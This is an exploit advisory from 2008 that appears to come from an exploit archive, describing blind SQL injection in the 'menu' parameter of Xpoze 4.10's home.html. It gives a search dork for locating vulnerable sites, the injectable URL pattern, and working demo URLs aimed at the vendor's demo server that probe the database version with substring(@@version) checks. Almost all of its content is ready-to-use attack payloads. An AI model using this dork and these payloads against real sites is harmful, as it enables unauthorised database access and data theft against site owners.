id: 4426
date: 12/12/2008
title: Xpoze 4.10 (home.html menu) Blind SQL Injection Vulnerability
author: XaDoS
cves: 

=============================================================
Xpoze 4.10 (home.html menu) Blind SQL Injection Vulnerability
=============================================================


[¦]  Xpoze Pro  (home menu) <= Blind $ql Injection

 
>---------------------------------------<

> AuToR: XaDoS (SecurityCode Team)
> B§g: Blind $ql inJection
> SIte vuln: http://www.xpoze.org/

>---------------------------------------<
 
 
[¦] ExPL0iT:
 
Dork: " Powered by Xpoze "

|: http://www.example.com/home.html?menu=[$qL] 


[¦] D?M0: 
 
|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=5  [NO°°]
 
|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=4 [y&$ ;-)] 
 




#  0day.today [2023-03-26]  #